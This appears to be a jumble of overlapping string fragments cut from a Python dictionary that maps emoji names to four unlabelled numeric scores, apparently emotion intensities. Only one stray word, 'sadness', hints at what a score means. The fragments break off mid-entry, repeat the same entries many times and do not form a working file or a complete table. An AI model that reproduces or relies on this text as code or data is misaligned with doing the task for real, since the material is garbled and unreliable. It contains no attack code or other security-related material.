0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\":", "\":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231,", "0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996],", "[0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249,", "0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\":", "0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42,", "[0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265,", "0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327],", "[0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998,", "0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\":", "0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032,", "[0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15,", "\":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], 
\":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096,", "0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136,", "[0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001,", "0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196,", "\":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179,", "\":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15,", "[0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043,", "0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493,", "0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151,", "0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136,", "0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251,", "0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\":", "0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 
0.266],", "\":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064,", "\":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998,", "0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075,", "\":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142,", "0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285],", "0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159,", "0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\":", "\":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999,", "0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\":", "0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128],", "0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263],", "0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], 
\":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095],", "[0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214,", "0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268,", "\":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213,", "[0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429,", "0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\":", "[0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111,", "[0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002,", "0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\":", "[0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003,", "[0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147,", "0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\":", "\":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], 
\":snowman_without_snow:\": [0.11900000000000001, 0.203,", "[0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27,", "0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203,", "0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273],", "0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\":", "0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\":", "0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245],", "0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087],", "\":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997,", "\":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998,", "\":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998,", "0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198,", "[0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998,", "0.249, 0.212], 
\":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\":", "0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292],", "0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\":", "0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182],", "\":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001,", "0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\":", "[0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003,", "0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998],", "0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\":", "\":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359,", "[0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136,", "0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 
0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\":", "0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\":", "0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\":", "[0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209,", "0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003,", "0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\":", "0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251],", "\":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155,", "sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196,", "0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\":", "\":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251,", "0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134,", "\":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 
0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24,", "0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998],", "[0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062,", "[0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003,", "0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998,", "[0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002,", "\":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142,", "0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213,", "[0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237,", "\":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191,", "0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\":", "[0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], 
\":video_game:\": [0.138, 0.20199999999999999, 0.145,", "[0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141,", "0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\":", "0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153],", "0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187,", "[0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254,", "0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\":", "\":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157,", "0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\":", "0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121],", "\":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419,", "0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\":", "0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 
0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004],", "\":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253,", "[0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301,", "\":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397,", "0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001],", "0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\":", "\":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225,", "[0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129,", "0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002],", "\":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267,", "0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\":", "0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\":", "[0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051,", 
"[0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998,", "\":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14,", "\":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004,", "0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22,", "\":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131,", "0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319],", "0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\":", "0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\":", "0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\":", "0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129],", "0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\":", "0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\":", "\":backhand_index_pointing_down:\": 
[0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998,", "[0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092,", "[0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312,", "\":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327,", "\":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002,", "0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\":", "\":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094,", "[0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149,", "0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998,", "\":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187,", "\":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271,", "0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 
0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3],", "0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301,", "0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145,", "[0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264,", "[0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188,", "0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09],", "\":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147,", "[0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1,", "\":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259,", "0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261,", "[0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256,", "0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\":", "\":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 
0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209,", "0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002,", "\":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284,", "0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\":", "0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\":", "\":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 